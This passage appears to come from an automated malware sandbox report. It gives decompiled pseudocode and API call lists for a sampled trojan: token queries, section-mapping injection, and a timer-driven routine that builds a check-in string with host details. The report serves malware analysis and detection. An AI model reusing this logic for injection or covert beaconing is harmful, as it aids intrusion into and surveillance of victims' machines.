                                                                                                                                                                                                                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02BB634E
                                                                                                                                                                                                                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02BB6361
                                                                                                                                                                                                                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02BB637D
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02BB639A
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 02BB63A7
                                                                                                                                                                                                                                • NtClose.NTDLL(?), ref: 02BB63B9
                                                                                                                                                                                                                                • NtClose.NTDLL(00000000), ref: 02BB63C3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2575439697-0
                                                                                                                                                                                                                                • Opcode ID: d6097635cd13f8146f2eaaa20aafbd8be222b915ed787059b1e00ac9f02e95fd
                                                                                                                                                                                                                                • Instruction ID: df618ddc604796cc2ad391d19d0ad840677bd715d81bc69f98b32d9320302791
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6097635cd13f8146f2eaaa20aafbd8be222b915ed787059b1e00ac9f02e95fd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A210772900218BFDB02DFA4CC45DEEBFBDEF08750F104066FA01E6110D7B19A549BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                			E02B812E2(intOrPtr* __eax, void** _a4) {
                                                                                                                                                                                                                                				int _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                				int _v28;
                                                                                                                                                                                                                                				int _v32;
                                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                                				int _v40;
                                                                                                                                                                                                                                				int _v44;
                                                                                                                                                                                                                                				void* _v48;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				long _t34;
                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                                                				intOrPtr* _t48;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t48 = __eax;
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                                				_v48 = 0x18;
                                                                                                                                                                                                                                				_v44 = 0;
                                                                                                                                                                                                                                				_v36 = 0x40;
                                                                                                                                                                                                                                				_v40 = 0;
                                                                                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                                                                                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                                                                                                                				if(_t34 < 0) {
                                                                                                                                                                                                                                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					 *_t48 = _v16;
                                                                                                                                                                                                                                					_t39 = E02B8138A(_t48,  &_v12); // executed
                                                                                                                                                                                                                                					_t47 = _t39;
                                                                                                                                                                                                                                					if(_t47 != 0) {
                                                                                                                                                                                                                                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						memset(_v12, 0, _v24);
                                                                                                                                                                                                                                						 *_a4 = _v12;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t47;
                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 02B8133F
                                                                                                                                                                                                                                  • Part of subcall function 02B8138A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,02B81354,00000002,00000000,?,?,00000000,?,?,02B81354,00000002), ref: 02B813B7
                                                                                                                                                                                                                                • memset.NTDLL ref: 02B81361
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Section$CreateViewmemset
                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                • API String ID: 2533685722-2766056989
                                                                                                                                                                                                                                • Opcode ID: 14dd23b65c741bf67f1e39e3ddc61994533c0620d39a5c637d69a7a96097d9f8
                                                                                                                                                                                                                                • Instruction ID: 0b37288e2b44deab3b8995bef67520d385c8395880fea7b922a611d4902cb767
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14dd23b65c741bf67f1e39e3ddc61994533c0620d39a5c637d69a7a96097d9f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52210BB2D00209AFCB11DFA9C8849EEFBB9EB48354F108569E509F3610D730AA45CF60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E02B8138A(void** __esi, PVOID* _a4) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				long _t13;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                                                                                                                				if(_t13 < 0) {
                                                                                                                                                                                                                                					_push(_t13);
                                                                                                                                                                                                                                					return __esi[6]();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,02B81354,00000002,00000000,?,?,00000000,?,?,02B81354,00000002), ref: 02B813B7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: SectionView
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1323581903-0
                                                                                                                                                                                                                                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                • Instruction ID: b8d52cb90d3925fd2609bd497f8398ee134e3a97b9df99d21deba71681e9cd17
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3F01CB690020CBFEB119FA9DC85CAFBBFDEB44394B108979F156E1190D6309E098A60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 66%
                                                                                                                                                                                                                                			E02BBA565(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                                                                                                                                				intOrPtr _v0;
                                                                                                                                                                                                                                				intOrPtr _v4;
                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				long _t25;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				intOrPtr _t27;
                                                                                                                                                                                                                                				intOrPtr _t28;
                                                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                                                				intOrPtr _t30;
                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                                                				int _t37;
                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                                                				intOrPtr* _t56;
                                                                                                                                                                                                                                				intOrPtr _t62;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				intOrPtr _t71;
                                                                                                                                                                                                                                				intOrPtr _t74;
                                                                                                                                                                                                                                				int _t77;
                                                                                                                                                                                                                                				intOrPtr _t78;
                                                                                                                                                                                                                                				int _t81;
                                                                                                                                                                                                                                				intOrPtr _t83;
                                                                                                                                                                                                                                				int _t86;
                                                                                                                                                                                                                                				intOrPtr* _t89;
                                                                                                                                                                                                                                				intOrPtr* _t90;
                                                                                                                                                                                                                                				void* _t91;
                                                                                                                                                                                                                                				void* _t95;
                                                                                                                                                                                                                                				void* _t96;
                                                                                                                                                                                                                                				void* _t97;
                                                                                                                                                                                                                                				intOrPtr _t98;
                                                                                                                                                                                                                                				void* _t100;
                                                                                                                                                                                                                                				int _t101;
                                                                                                                                                                                                                                				void* _t102;
                                                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                                                				void* _t105;
                                                                                                                                                                                                                                				void* _t106;
                                                                                                                                                                                                                                				void* _t108;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t95 = __edx;
                                                                                                                                                                                                                                				_t91 = __ecx;
                                                                                                                                                                                                                                				_t25 = __eax;
                                                                                                                                                                                                                                				_t105 = _a16;
                                                                                                                                                                                                                                				_v4 = 8;
                                                                                                                                                                                                                                				if(__eax == 0) {
                                                                                                                                                                                                                                					_t25 = GetTickCount();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t26 =  *0x2bbd018; // 0x9ad51634
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t27 =  *0x2bbd014; // 0x3a87c8cd
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t28 =  *0x2bbd010; // 0xd8d2f808
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t29 =  *0x2bbd00c; // 0x13d015ef
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t30 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                				_t3 = _t30 + 0x2bbe633; // 0x74666f73
                                                                                                                                                                                                                                				_t101 = wsprintfA(_t105, _t3, 2, 0x3f878, _t29, _t28, _t27, _t26,  *0x2bbd02c,  *0x2bbd004, _t25);
                                                                                                                                                                                                                                				_t33 = E02BB5C12();
                                                                                                                                                                                                                                				_t34 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                				_t4 = _t34 + 0x2bbe673; // 0x74707526
                                                                                                                                                                                                                                				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                                                                                                                                                                                                				_t108 = _t106 + 0x38;
                                                                                                                                                                                                                                				_t102 = _t101 + _t37; // executed
                                                                                                                                                                                                                                				_t38 = E02BB508C(_t91); // executed
                                                                                                                                                                                                                                				_t96 = _t38;
                                                                                                                                                                                                                                				if(_t96 != 0) {
                                                                                                                                                                                                                                					_t83 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                					_t6 = _t83 + 0x2bbe8cc; // 0x736e6426
                                                                                                                                                                                                                                					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                                                                                                                                                                                                					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                					_t102 = _t102 + _t86;
                                                                                                                                                                                                                                					HeapFree( *0x2bbd270, 0, _t96);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t97 = E02BB6706();
                                                                                                                                                                                                                                				if(_t97 != 0) {
                                                                                                                                                                                                                                					_t78 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                					_t8 = _t78 + 0x2bbe8d4; // 0x6f687726
                                                                                                                                                                                                                                					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                                                                                                                                                                                                					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                					_t102 = _t102 + _t81;
                                                                                                                                                                                                                                					HeapFree( *0x2bbd270, 0, _t97);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t98 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                				_a32 = E02BB6DFA(0x2bbd00a, _t98 + 4);
                                                                                                                                                                                                                                				_t42 =  *0x2bbd308; // 0x0
                                                                                                                                                                                                                                				if(_t42 != 0) {
                                                                                                                                                                                                                                					_t74 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                					_t11 = _t74 + 0x2bbe8ae; // 0x3d736f26
                                                                                                                                                                                                                                					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                                                                                                                                                                                                					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                					_t102 = _t102 + _t77;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t43 =  *0x2bbd304; // 0x0
                                                                                                                                                                                                                                				if(_t43 != 0) {
                                                                                                                                                                                                                                					_t71 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                					_t13 = _t71 + 0x2bbe885; // 0x3d706926
                                                                                                                                                                                                                                					wsprintfA(_t102 + _t105, _t13, _t43);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_a32 != 0) {
                                                                                                                                                                                                                                					_t46 = RtlAllocateHeap( *0x2bbd270, 0, 0x800); // executed
                                                                                                                                                                                                                                					_t100 = _t46;
                                                                                                                                                                                                                                					if(_t100 != 0) {
                                                                                                                                                                                                                                						E02BBA425(GetTickCount());
                                                                                                                                                                                                                                						_t50 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                						__imp__(_t50 + 0x40);
                                                                                                                                                                                                                                						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                						_t54 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                						__imp__(_t54 + 0x40);
                                                                                                                                                                                                                                						_t56 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                						_t103 = E02BB22AB(1, _t95, _t105,  *_t56);
                                                                                                                                                                                                                                						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                						if(_t103 != 0) {
                                                                                                                                                                                                                                							StrTrimA(_t103, 0x2bbc2ac);
                                                                                                                                                                                                                                							_push(_t103);
                                                                                                                                                                                                                                							_t62 = E02BB2629();
                                                                                                                                                                                                                                							_v16 = _t62;
                                                                                                                                                                                                                                							if(_t62 != 0) {
                                                                                                                                                                                                                                								_t89 = __imp__;
                                                                                                                                                                                                                                								 *_t89(_t103, _v0);
                                                                                                                                                                                                                                								 *_t89(_t100, _a4);
                                                                                                                                                                                                                                								_t90 = __imp__;
                                                                                                                                                                                                                                								 *_t90(_t100, _v28);
                                                                                                                                                                                                                                								 *_t90(_t100, _t103);
                                                                                                                                                                                                                                								_t68 = E02BB2168(0xffffffffffffffff, _t100, _v28, _v24); // executed
                                                                                                                                                                                                                                								_v52 = _t68;
                                                                                                                                                                                                                                								if(_t68 != 0 && _t68 != 0x10d2) {
                                                                                                                                                                                                                                									E02BB651D();
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								RtlFreeHeap( *0x2bbd270, 0, _v44); // executed
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							HeapFree( *0x2bbd270, 0, _t103);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						RtlFreeHeap( *0x2bbd270, 0, _t100); // executed
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					HeapFree( *0x2bbd270, 0, _a24);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				RtlFreeHeap( *0x2bbd270, 0, _t105); // executed
                                                                                                                                                                                                                                				return _a4;
                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BBA57C
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BBA5C9
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BBA5E6
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BBA609
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BBA619
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BBA63B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BBA64B
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BBA682
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BBA6A2
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BBA6BF
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BBA6CF
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(052F9570), ref: 02BBA6E3
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(052F9570), ref: 02BBA701
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,02BBA714,?,052F95B0), ref: 02BB22D6
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: lstrlen.KERNEL32(?,?,?,02BBA714,?,052F95B0), ref: 02BB22DE
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: strcpy.NTDLL ref: 02BB22F5
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: lstrcat.KERNEL32(00000000,?), ref: 02BB2300
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BBA714,?,052F95B0), ref: 02BB231D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,02BBC2AC,?,052F95B0), ref: 02BBA733
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrlen.KERNEL32(052F9B98,00000000,00000000,770CC740,02BBA73F,00000000), ref: 02BB2639
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrlen.KERNEL32(?), ref: 02BB2641
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrcpy.KERNEL32(00000000,052F9B98), ref: 02BB2655
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrcat.KERNEL32(00000000,?), ref: 02BB2660
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,?), ref: 02BBA752
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,00000000), ref: 02BBA759
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 02BBA766
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 02BBA76A
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,00000000,?,?), ref: 02BBA79A
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BBA7A9
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,052F95B0), ref: 02BBA7B8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BBA7CA
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?), ref: 02BBA7D9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3963266935-1536154274
                                                                                                                                                                                                                                • Opcode ID: 0f1ff083681292a16bcd762eaddee5b543eb6802fa1820c1f08ca20b8ab47ca3
                                                                                                                                                                                                                                • Instruction ID: 0fe151224fb52e07829b1483604e241e532a5680d2ffc65fef00c9a3da11828e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f1ff083681292a16bcd762eaddee5b543eb6802fa1820c1f08ca20b8ab47ca3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5619F71D80206AFC723DB64ED44FAA3BA8FF48380F050825F945D3251DBB9E926DB65
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                			E02BB9FF2(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                				struct %anon52 _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                                				union _LARGE_INTEGER _v36;
                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                				void _v88;
                                                                                                                                                                                                                                				char _v92;
                                                                                                                                                                                                                                				struct %anon52 _t46;
                                                                                                                                                                                                                                				intOrPtr _t51;
                                                                                                                                                                                                                                				long _t53;
                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                				struct %anon52 _t60;
                                                                                                                                                                                                                                				long _t64;
                                                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                				void* _t70;
                                                                                                                                                                                                                                				signed int _t71;
                                                                                                                                                                                                                                				intOrPtr _t73;
                                                                                                                                                                                                                                				intOrPtr _t76;
                                                                                                                                                                                                                                				void** _t78;
                                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t73 = __edx;
                                                                                                                                                                                                                                				_v92 = 0;
                                                                                                                                                                                                                                				memset( &_v88, 0, 0x2c);
                                                                                                                                                                                                                                				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                                                                                                                				_v44 = _t46;
                                                                                                                                                                                                                                				if(_t46 == 0) {
                                                                                                                                                                                                                                					_v8.LowPart = GetLastError();
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_push(0xffffffff);
                                                                                                                                                                                                                                					_push(0xff676980);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push( *0x2bbd278);
                                                                                                                                                                                                                                					_v20 = 0;
                                                                                                                                                                                                                                					_v16 = 0;
                                                                                                                                                                                                                                					L02BBAEC0();
                                                                                                                                                                                                                                					_v36.LowPart = _t46;
                                                                                                                                                                                                                                					_v32 = _t73;
                                                                                                                                                                                                                                					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                                                                                                                                					_t51 =  *0x2bbd2a4; // 0x2d8
                                                                                                                                                                                                                                					_v40 = _t51;
                                                                                                                                                                                                                                					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                					_v8.LowPart = _t53;
                                                                                                                                                                                                                                					if(_t53 == 0) {
                                                                                                                                                                                                                                						if(_a8 != 0) {
                                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                                							 *0x2bbd284 = 5;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t68 = E02BB2932(_t73); // executed
                                                                                                                                                                                                                                							if(_t68 != 0) {
                                                                                                                                                                                                                                								goto L4;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_v12 = 0;
                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                						if(_v12 == 1 && ( *0x2bbd298 & 0x00000001) == 0) {
                                                                                                                                                                                                                                							_v12 = 2;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t71 = _v12;
                                                                                                                                                                                                                                						_t58 = _t71 << 4;
                                                                                                                                                                                                                                						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                                                                                                                                                                                                						_t72 = _t71 + 1;
                                                                                                                                                                                                                                						_v24 = _t71 + 1;
                                                                                                                                                                                                                                						_t60 = E02BB462F(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
                                                                                                                                                                                                                                						_v8.LowPart = _t60;
                                                                                                                                                                                                                                						if(_t60 != 0) {
                                                                                                                                                                                                                                							goto L17;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t65 = _v24;
                                                                                                                                                                                                                                						_v12 = _t65;
                                                                                                                                                                                                                                						_t90 = _t65 - 3;
                                                                                                                                                                                                                                						if(_t65 != 3) {
                                                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_v8.LowPart = E02BB516C(_t72, _t90,  &_v92, _a4, _a8);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                						L17:
                                                                                                                                                                                                                                						__eflags = _t60 - 0x10d2;
                                                                                                                                                                                                                                						if(_t60 != 0x10d2) {
                                                                                                                                                                                                                                							_push(0xffffffff);
                                                                                                                                                                                                                                							_push(0xff676980);
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push( *0x2bbd27c);
                                                                                                                                                                                                                                							goto L21;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							__eflags =  *0x2bbd280; // 0x0
                                                                                                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                                                                                                								goto L12;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t60 = E02BB651D();
                                                                                                                                                                                                                                								_push(0xffffffff);
                                                                                                                                                                                                                                								_push(0xdc3cba00);
                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                								_push( *0x2bbd280);
                                                                                                                                                                                                                                								L21:
                                                                                                                                                                                                                                								L02BBAEC0();
                                                                                                                                                                                                                                								_v36.LowPart = _t60;
                                                                                                                                                                                                                                								_v32 = _t76;
                                                                                                                                                                                                                                								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                								_v8.LowPart = _t64;
                                                                                                                                                                                                                                								__eflags = _t64;
                                                                                                                                                                                                                                								if(_t64 == 0) {
                                                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									goto L12;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L25:
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					_t78 =  &_v92;
                                                                                                                                                                                                                                					_t70 = 3;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t54 =  *_t78;
                                                                                                                                                                                                                                						if(_t54 != 0) {
                                                                                                                                                                                                                                							HeapFree( *0x2bbd270, 0, _t54);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t78 =  &(_t78[4]);
                                                                                                                                                                                                                                						_t70 = _t70 - 1;
